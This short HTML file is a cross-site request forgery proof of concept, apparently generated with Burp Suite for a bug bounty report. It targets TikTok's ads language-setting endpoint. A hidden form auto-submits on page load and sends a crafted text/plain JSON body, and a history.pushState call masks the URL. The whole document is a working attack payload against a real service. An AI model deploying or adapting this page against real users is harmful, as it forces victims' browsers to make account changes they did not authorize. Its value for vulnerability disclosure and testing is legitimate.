<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ads.tiktok.com/ac/api/user/lang" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;lang&quot;&#58;&quot;en&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
